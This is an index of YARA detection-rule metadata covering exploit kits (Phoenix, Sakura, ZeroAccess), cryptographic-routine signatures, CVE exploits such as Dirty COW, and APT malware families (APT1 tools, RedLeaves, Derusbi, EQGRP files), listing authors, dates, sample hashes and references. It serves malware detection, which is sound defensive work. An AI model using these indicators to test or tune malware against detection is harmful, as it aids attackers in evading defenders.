exploit_kits_index phoenix_pdf author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 16de68e66cab08d642a669bf377368da hash1: bab281fe0cf3a16a396550b15d9167d5 sample_filetype: pdf yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_pdf2 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 33cb6c67f58609aa853e80f718ab106a sample_filetype: pdf yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_pdf3 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: bab281fe0cf3a16a396550b15d9167d5 sample_filetype: pdf yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index sakura_jar author: Josh Berry date: 2016-06-26 description: Sakura Exploit Kit Detection hash0: a566ba2e3f260c90e01366e8b0d724eb sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index sakura_jar2 author: Josh Berry date: 2016-06-26 description: Sakura Exploit Kit Detection hash0: d21b4e2056e5ef9f9432302f445bcbe1 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_css author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: 4944324bad3b020618444ee131dce3d0 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_css2 author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: e300d6a36b9bfc3389f64021e78b1503 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_htm author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: 0e7d72749b60c8f05d4ff40da7e0e937 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_js author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: a9f30483a197cfdc65b4a70b8eb738ab sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_js2 author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: b5fda04856b98c254d33548cc1c1216c sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_js3 author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: 5f13fdfb53a3e60e93d7d1d7bbecff4f sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_js4 author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: 268ae96254e423e9d670ebe172d1a444 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zerox88_js2 author: Josh Berry date: 2016-06-26 description: 0x88 Exploit Kit Detection hash0: cad8b652338f5e3bc93069c8aa329301 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zerox88_js3 author: Josh Berry date: 2016-06-26 description: 0x88 Exploit Kit Detection hash0: 9df0ac2fa92e602ec11bac53555e2d82 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeus_js author: Josh Berry date: 2016-06-26 description: Zeus Exploit Kit Detection hash0: c87ac7a25168df49a64564afb04dc961 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
crypto_index Big_Numbers0 author: _pusher_ description: Looks for big numbers 20:sized date: 2016-07
crypto_index Big_Numbers1 author: _pusher_ description: Looks for big numbers 32:sized date: 2016-07
crypto_index Big_Numbers2 author: _pusher_ description: Looks for big numbers 48:sized date: 2016-07
crypto_index Big_Numbers3 author: _pusher_ description: Looks for big numbers 64:sized date: 2016-07
crypto_index Prime_Constants_char author: _pusher_ description: List of primes [char] date: 2016-07
crypto_index Prime_Constants_long author: _pusher_ description: List of primes [long] date: 2016-07
crypto_index Advapi_Hash_API author: _pusher_ description: Looks for advapi API functions date: 2016-07
crypto_index Crypt32_CryptBinaryToString_API author: _pusher_ description: Looks for crypt32 CryptBinaryToStringA function date: 2016-08
crypto_index CRC32c_poly_Constant author: _pusher_ description: Look for CRC32c (Castagnoli) [poly] date: 2016-08
crypto_index CRC32_poly_Constant author: _pusher_ description: Look for CRC32 [poly] date: 2015-05 version: 0.1
crypto_index CRC32_table author: _pusher_ description: Look for CRC32 table date: 2015-05 version: 0.1
crypto_index CRC32_table_lookup author: _pusher_ description: CRC32 table lookup date: 2015-06 version: 0.1
crypto_index CRC32b_poly_Constant author: _pusher_ description: Look for CRC32b [poly] date: 2016-04 version: 0.1
crypto_index CRC16_table author: _pusher_ description: Look for CRC16 table date: 2016-04 version: 0.1
crypto_index FlyUtilsCnDES_ECB_Encrypt author: _pusher_ description: Look for FlyUtils.CnDES Encrypt ECB function date: 2016-07
crypto_index FlyUtilsCnDES_ECB_Decrypt author: _pusher_ description: Look for FlyUtils.CnDES Decrypt ECB function date: 2016-07
crypto_index Elf_Hash author: _pusher_ description: Look for ElfHash date: 2015-06 version: 0.3
crypto_index BLOWFISH_Constants author: phoul (@phoul) description: Look for Blowfish constants date: 2014-01 version: 0.1
crypto_index MD5_Constants author: phoul (@phoul) description: Look for MD5 constants date: 2014-01 version: 0.2
crypto_index MD5_API author: _pusher_ description: Looks for MD5 API date: 2016-07
crypto_index RC6_Constants author: chort (@chort0) description: Look for RC6 magic constants in binary reference: https://twitter.com/mikko/status/417620511397400576 reference2: https://twitter.com/dyngnosis/status/418105168517804033 date: 2013-12 version: 0.2
crypto_index RIPEMD160_Constants author: phoul (@phoul) description: Look for RIPEMD-160 constants date: 2014-01 version: 0.1
crypto_index SHA1_Constants author: phoul (@phoul) description: Look for SHA1 constants date: 2014-01 version: 0.1
crypto_index SHA512_Constants author: phoul (@phoul) description: Look for SHA384/SHA512 constants date: 2014-01 version: 0.1
crypto_index TEAN author: _pusher_ description: Look for TEA Encryption date: 2016-08
crypto_index WHIRLPOOL_Constants author: phoul (@phoul) description: Look for WhirlPool constants date: 2014-02 version: 0.1
crypto_index DarkEYEv3_Cryptor description: Rule to detect DarkEYEv3 encrypted executables (often malware) author: Florian Roth reference: http://darkeyev3.blogspot.fi/ date: 2015-05-24 hash0: 6b854b967397f7de0da2326bdd5d39e710e2bb12 hash1: d53149968eca654fc0e803f925e7526fdac2786c hash2: 7e3a8940d446c57504d6a7edb6445681cca31c65 hash3: d3dd665dd77b02d7024ac16eb0949f4f598299e7 hash4: a907a7b74a096f024efe57953c85464e87275ba3 hash5: b1c422155f76f992048377ee50c79fe164b22293 hash6: 29f5322ce5e9147f09e0a86cc23a7c8dc88721b9 hash7: a0382d7c12895489cb37efef74c5f666ea750b05 hash8: f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61 score: 55
crypto_index Miracl_powmod author: Maxx description: Miracl powmod
crypto_index Miracl_crt author: Maxx description: Miracl crt
crypto_index CryptoPP_a_exp_b_mod_c author: Maxx description: CryptoPP a_exp_b_mod_c
crypto_index CryptoPP_modulo author: Maxx description: CryptoPP modulo
crypto_index FGint_MontgomeryModExp author: _pusher_ date: 2015-06 version: 0.2 description: FGint MontgomeryModExp
crypto_index FGint_FGIntModExp author: _pusher_ date: 2015-05 description: FGint FGIntModExp
crypto_index FGint_MulByInt author: _pusher_ date: 2015-05 description: FGint MulByInt
crypto_index FGint_DivMod author: _pusher_ date: 2015-05 description: FGint FGIntDivMod
crypto_index FGint_FGIntDestroy author: _pusher_ date: 2015-05 description: FGint FGIntDestroy
crypto_index FGint_Base10StringToGInt author: _pusher_ date: 2015-06 version: 0.2 description: FGint Base10StringToGInt
crypto_index FGint_ConvertBase256to64 author: _pusher_ date: 2015-05 description: FGint ConvertBase256to64
crypto_index FGint_ConvertHexStringToBase256String author: _pusher_ date: 2015-06 version: 0.2 description: FGint ConvertHexStringToBase256String
crypto_index FGint_Base256StringToGInt author: _pusher_ date: 2015-05 description: FGint Base256StringToGInt
crypto_index FGint_FGIntToBase256String author: _pusher_ date: 2015-06 version: 0.2 description: FGint FGIntToBase256String
crypto_index FGint_ConvertBase256StringToHexString author: _pusher_ date: 2015-05 description: FGint ConvertBase256StringToHexString
crypto_index FGint_PGPConvertBase256to64 author: _pusher_ date: 2016-08 description: FGint PGPConvertBase256to64
crypto_index FGint_RSAEncrypt author: _pusher_ date: 2015-05 description: FGint RSAEncrypt
crypto_index FGint_RsaDecrypt author: Maxx description: FGint RsaDecrypt
crypto_index FGint_RSAVerify author: _pusher_ description: FGint RSAVerify
crypto_index FGint_FindPrimeGoodCurveAndPoint author: _pusher_ date: 2015-06 description: FGint FindPrimeGoodCurveAndPoint version: 0.1
crypto_index FGint_ECElGamalEncrypt author: _pusher_ date: 2016-08 description: FGint ECElGamalEncrypt version: 0.1
crypto_index FGint_ECAddPoints author: _pusher_ date: 2015-06 description: FGint ECAddPoints version: 0.1
crypto_index FGint_ECPointKMultiple author: _pusher_ date: 2015-06 description: FGint ECPointKMultiple version: 0.1
crypto_index FGint_ECPointDestroy author: _pusher_ date: 2015-06 description: FGint ECPointDestroy version: 0.1
crypto_index FGint_DSAPrimeSearch author: _pusher_ date: 2016-08 description: FGint DSAPrimeSearch version: 0.1
crypto_index FGint_DSASign author: _pusher_ date: 2016-08 description: FGint DSASign version: 0.1
crypto_index FGint_DSAVerify author: _pusher_ date: 2016-08 description: FGint DSAVerify version: 0.1
crypto_index DES_Long author: _pusher_ date: 2015-05 description: DES [long]
crypto_index DES_sbox author: _pusher_ date: 2015-05 description: DES [sbox]
crypto_index DES_pbox_long author: _pusher_ date: 2015-05 description: DES [pbox] [long]
crypto_index OpenSSL_BN_mod_exp2_mont author: Maxx description: OpenSSL BN_mod_exp2_mont
crypto_index OpenSSL_BN_mod_exp_mont author: Maxx description: OpenSSL BN_mod_exp_mont
crypto_index OpenSSL_BN_mod_exp_recp author: Maxx description: OpenSSL BN_mod_exp_recp
crypto_index OpenSSL_BN_mod_exp_simple author: Maxx description: OpenSSL BN_mod_exp_simple
crypto_index OpenSSL_BN_mod_exp_inverse author: Maxx description: OpenSSL BN_mod_exp_inverse
crypto_index OpenSSL_DSA author: _pusher_ date: 2016-08
crypto_index FGint_RsaSign author: Maxx description: FGint RsaSign
crypto_index LockBox_RsaEncryptFile author: Maxx description: LockBox RsaEncryptFile
crypto_index LockBox_DecryptRsaEx author: Maxx description: LockBox DecryptRsaEx
crypto_index LockBox_EncryptRsaEx author: Maxx description: LockBox EncryptRsaEx
crypto_index LockBox_TlbRsaKey author: Maxx description: LockBox TlbRsaKey
crypto_index BigDig_bpInit author: Maxx description: BigDig bpInit
crypto_index BigDig_mpModExp author: Maxx description: BigDig mpModExp
crypto_index BigDig_mpModInv author: Maxx description: BigDig mpModInv
crypto_index BigDig_mpModMult author: Maxx description: BigDig mpModMult
crypto_index BigDig_mpModulo author: Maxx description: BigDig mpModulo
crypto_index BigDig_spModExpB author: Maxx description: BigDig spModExpB
crypto_index BigDig_spModInv author: Maxx description: BigDig spModInv
crypto_index BigDig_spModMult author: Maxx description: BigDig spModMult
crypto_index CryptoPP_ApplyFunction author: Maxx description: CryptoPP ApplyFunction
crypto_index CryptoPP_RsaFunction author: Maxx description: CryptoPP RsaFunction
crypto_index CryptoPP_Integer_constructor author: Maxx description: CryptoPP Integer constructor
crypto_index RijnDael_AES author: _pusher_ description: RijnDael AES date: 2016-06
crypto_index RijnDael_AES_CHAR author: _pusher_ description: RijnDael AES (check2) [char] date: 2016-06
crypto_index RijnDael_AES_CHAR_inv author: _pusher_ description: RijnDael AES S-inv [char] date: 2016-07
crypto_index RijnDael_AES_LONG author: _pusher_ description: RijnDael AES date: 2016-06
crypto_index RsaRef2_NN_modExp author: Maxx description: RsaRef2 NN_modExp
crypto_index RsaRef2_NN_modInv author: Maxx description: RsaRef2 NN_modInv
crypto_index RsaRef2_NN_modMult author: Maxx description: RsaRef2 NN_modMult
crypto_index RsaRef2_RsaPrivateDecrypt author: Maxx description: RsaRef2 RsaPrivateDecrypt
crypto_index RsaRef2_RsaPrivateEncrypt author: Maxx description: RsaRef2 RsaPrivateEncrypt
crypto_index RsaRef2_RsaPublicDecrypt author: Maxx description: RsaRef2 RsaPublicDecrypt
crypto_index RsaRef2_RsaPublicEncrypt author: Maxx description: RsaRef2 RsaPublicEncrypt
crypto_index RsaEuro_NN_modInv author: Maxx description: RsaEuro NN_modInv
crypto_index RsaEuro_NN_modMult author: Maxx description: RsaEuro NN_modMult
crypto_index Miracl_Big_constructor author: Maxx description: Miracl Big constructor
crypto_index Miracl_mirvar author: Maxx description: Miracl mirvar
crypto_index Miracl_mirsys_init author: Maxx description: Miracl mirsys init
crypto_index BASE64_table author: _pusher_ description: Look for Base64 table date: 2015-07 version: 0.1
crypto_index Delphi_Random author: _pusher_ description: Look for Random function date: 2015-08 version: 0.1
crypto_index Delphi_RandomRange author: _pusher_ description: Look for RandomRange function date: 2016-06 version: 0.1
crypto_index Delphi_FormShow author: _pusher_ description: Look for Form.Show function date: 2016-06 version: 0.1
crypto_index Delphi_CompareCall author: _pusher_ description: Look for Compare string function date: 2016-07
crypto_index Delphi_Copy author: _pusher_ description: Look for Copy function date: 2016-06 version: 0.1
crypto_index Delphi_IntToStr author: _pusher_ description: Look for IntToStr function date: 2016-04 version: 0.1
crypto_index Delphi_StrToInt author: _pusher_ description: Look for StrToInt function date: 2016-06 version: 0.1
crypto_index Delphi_DecodeDate author: _pusher_ description: Look for DecodeDate (DecodeDateFully) function date: 2016-06 version: 0.1
crypto_index Unknown_Random author: _pusher_ description: Look for Random function date: 2016-07
crypto_index VC6_Random author: _pusher_ description: Look for Random function date: 2016-02
crypto_index VC8_Random author: _pusher_ description: Look for Random function date: 2016-01 version: 0.1
crypto_index DCP_RIJNDAEL_Init author: _pusher_ description: Look for DCP RijnDael Init date: 2016-07
crypto_index DCP_RIJNDAEL_EncryptECB author: _pusher_ description: Look for DCP RijnDael EncryptECB date: 2016-07
crypto_index DCP_BLOWFISH_Init author: _pusher_ description: Look for DCP Blowfish Init date: 2016-07
crypto_index DCP_BLOWFISH_EncryptCBC author: _pusher_ description: Look for DCP Blowfish EncryptCBC date: 2016-07
crypto_index DCP_DES_Init author: _pusher_ description: Look for DCP Des Init date: 2016-02
crypto_index DCP_DES_EncryptECB author: _pusher_ description: Look for DCP Des EncryptECB date: 2016-02
cve_rules_index cve_2013_0074 author: Kaspersky Lab filetype: Win32 EXE date: 2015-07-23 version: 1.0
cve_rules_index Exploit_MS15_077_078 description: MS15-078 / MS15-077 exploit - generic signature author: Florian Roth reference: https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200 date: 2015-07-21 hash1: 18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c hash2: 0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d hash3: fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9 hash4: ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15
cve_rules_index Mal_http_EXE description: Detects trojan from APT report named http.exe author: Florian Roth reference: https://goo.gl/13Wgy1 date: 2016-05-25 score: 80 hash1: ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666
cve_rules_index Linux_DirtyCow_Exploit description: Detects Linux Dirty Cow Exploit - CVE-2012-0056 and CVE-2016-5195 author: Florian Roth reference: http://dirtycow.ninja/ date: 2016-10-21
malware_index LIGHTDART_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index AURIGA_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index BANGAT_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index BISCUIT_GREENCAT_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index BOUNCER_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index BOUNCER_DLL_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index CALENDAR_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index COMBOS_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index DAIRY_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index GLOOXMAIL_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index GOGGLES_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index HACKSFASE1_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index HACKSFASE2_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index KURTON_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MACROMAIL_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MANITSME_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MINIASP_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index NEWSREELS_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index SEASALT_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index STARSYPOUND_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index SWORD_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index thequickbrow_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index TABMSGSQL_APT1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index CCREWBACK1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index TrojanCookies_CCREW author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index GEN_CCREW1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index Elise author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index EclipseSunCloudRAT author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MoonProject author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewDownloader1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewDownloader2 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewMiniasp author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewSSLBack2 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewSSLBack3 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewSSLBack1 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewDownloader3 author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index ccrewQAZ author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index metaxcd author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index MiniASP author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index DownloaderPossibleCCrew author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_LIGHTBOLT author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_GETMAIL author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_GDOCUPLOAD author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_Y21K author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_YAHOO author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_UGX author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_TOCK author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_RAVE author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_QBP author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_HEAD author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_GREENCAT author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_DIV author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_CSON author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_CLOVER author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_BOLID author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_ADSPACE author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WEBC2_AUSOV author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_WARP author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_TARSIP_ECLIPSE author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_TARSIP_MOON author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_RARSilent_EXE_PDF author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_aspnetreport author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_Revird_svc author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_dbg_mess author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index APT1_known_malicious_RARSilent author: AlienVault Labs info: CommentCrew-threat-apt1
malware_index REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT author: USG true_positive: fb0c714cd2ebdcc6f33817abe7813c36 reference: https://www.us-cert.gov/ncas/alerts/TA17-117A
malware_index REDLEAVES_CoreImplant_UniqueStrings description: Strings identifying the core REDLEAVES RAT in its deobfuscated state author: USG reference: https://www.us-cert.gov/ncas/alerts/TA17-117A
malware_index PLUGX_RedLeaves author: US-CERT Code Analysis Team date: 2017/04/03 incident: 10118538 MD5_1: 598FF82EA4FB52717ACAFB227C83D474 MD5_2: 7D10708A518B26CC8C3CBFBAA224E032 MD5_3: AF406D35C77B1E0DF17F839E36BCE630 MD5_4: 6EB9E889B091A5647F6095DCD4DE7C83 MD5_5: 566291B277534B63EAFC938CDAAB8A399E41AF7D info: Detects specific RedLeaves and PlugX binaries reference: https://www.us-cert.gov/ncas/alerts/TA17-117A
malware_index APT3102Code description: 3102 code features author: Seth Hardy last_modified: 2014-06-25
malware_index APT9002Code description: 9002 code features author: Seth Hardy last_modified: 2014-06-25
malware_index APT9002Strings description: 9002 Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index APT9002 description: 9002 author: Seth Hardy last_modified: 2014-06-25
malware_index FE_APT_9002 Author: FireEye Labs Date: 2013/11/10 Description: Strings inside Reference: Useful link
malware_index apt_backspace description: Detects APT backspace author: Bit Byte Bitten date: 2015-05-14 hash: 6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99
malware_index APT_bestia author: Adam Ziaja <adam@adamziaja.com> http://adamziaja.com date: 2014-03-19 description: Bestia.3.02.012.07 malware used in APT attacks on Polish government references: http://zaufanatrzeciastrona.pl/post/ukierunkowany-atak-na-pracownikow-polskich-samorzadow/ hash0: 9bb03bb5af40d1202378f95a6485fba8 hash1: 7d9a806e0da0b869b10870dd6c7692c5 maltype: apt filetype: exe
malware_index apt_c16_win_memory_pcclient author: @dragonthreatlab md5: ec532bbe9d0882d403473102e9724557 description: File matching the md5 above tends to only live in memory, hence the lack of MZ header check. date: 2015/01/11 reference: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html
malware_index apt_c16_win_swisyn author: @dragonthreatlab md5: a6a18c846e5179259eba9de238f67e41 description: File matching the md5 above tends to only live in memory, hence the lack of MZ header check. date: 2015/01/11 reference: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html
malware_index apt_c16_win_wateringhole author: @dragonthreatlab description: Detects code from APT wateringhole date: 2015/01/11 reference: http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html
malware_index Careto_OSX_SBD author: AlienVault (Alberto Ortega) description: TheMask / Careto OSX component signature reference: www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf date: 2014/02/11
malware_index Careto_CnC author: AlienVault (Alberto Ortega) description: TheMask / Careto CnC communication signature reference: www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf date: 2014/02/11
malware_index Careto_CnC_domains author: AlienVault (Alberto Ortega) description: TheMask / Careto known command and control domains reference: www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf date: 2014/02/11
malware_index Casper_Included_Strings description: Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo author: Florian Roth reference: http://goo.gl/VRJNLo date: 2015/03/06 score: 50
malware_index Casper_SystemInformation_Output description: Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo author: Florian Roth reference: http://goo.gl/VRJNLo date: 2015/03/06 score: 70
malware_index Codoso_Gh0st_3 description: Detects Codoso APT Gh0st Malware author: Florian Roth reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks date: 2016-01-30 hash: bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd
malware_index Codoso_Gh0st_1 description: Detects Codoso APT Gh0st Malware author: Florian Roth reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks date: 2016-01-30 super_rule: 1 hash1: 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841 hash2: 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8 hash3: d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297
malware_index Codoso_PGV_PVID_3 description: Detects Codoso APT PGV PVID Malware author: Florian Roth reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks date: 2016-01-30 super_rule: 1 hash1: 126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1 hash2: 13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75 hash3: 8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761 hash4: b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1 hash5: b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3 hash6: bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe
malware_index Codoso_PGV_PVID_1 description: Detects Codoso APT PGV PVID Malware author: Florian Roth reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks date: 2016-01-30 super_rule: 1 hash1: 41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824 hash2: 58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3 hash3: 934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7 hash4: ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266 hash5: e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1
malware_index APT_DeputyDog_Fexel author: ThreatConnect Intelligence Research Team
malware_index APT_DeputyDog Author: FireEye Labs Date: 2013/09/21 Description: detects string seen in samples used in 2013-3893 0day attacks Reference: https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html
malware_index apt_win_exe_trojan_derusbi Author: @seifreed
malware_index Trojan_Derusbi Author: RSA_IR Date: 4Sept13 File: derusbi_variants v 1.3 MD5: c0d4c5b669cc5b51862db37e972d31ec
malware_index APT_Derusbi_DeepPanda author: ThreatConnect Intelligence Research Team reference: http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf
malware_index APT_Derusbi_Gen author: ThreatConnect Intelligence Research Team
malware_index derusbi_kernel description: Derusbi Driver version date: 2015-12-09 author: Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud
malware_index apt_win32_dll_bergard_pgv_pvid_variant copyright: Fidelis Cybersecurity reference: http://www.threatgeek.com/2016/05/turbo-twist-two-64-bit-derusbi-strains-converge.html
malware_index Dubnium_Sample_SSHOpenSSL description: Detects sample mentioned in the Dubnium Report author: Florian Roth reference: https://goo.gl/AW9Cuu date: 2016-06-10 hash1: 6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b hash2: feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8 hash3: 41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf hash4: bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f hash5: a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9 hash6: e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b
malware_index EQGRP_create_dns_injection description: EQGRP Toolset Firewall - file create_dns_injection.py author: Florian Roth reference: Research date: 2016-08-16 hash1: 488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32
malware_index EQGRP_tunnel_state_reader description: EQGRP Toolset Firewall - file tunnel_state_reader author: Florian Roth reference: Research date: 2016-08-16 hash1: 49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c
malware_index EQGRP_eligiblecandidate description: EQGRP Toolset Firewall - file eligiblecandidate.py author: Florian Roth reference: Research date: 2016-08-16 hash1: c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86
malware_index EQGRP_sniffer_xml2pcap description: EQGRP Toolset Firewall - file sniffer_xml2pcap author: Florian Roth reference: Research date: 2016-08-16 hash1: f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42
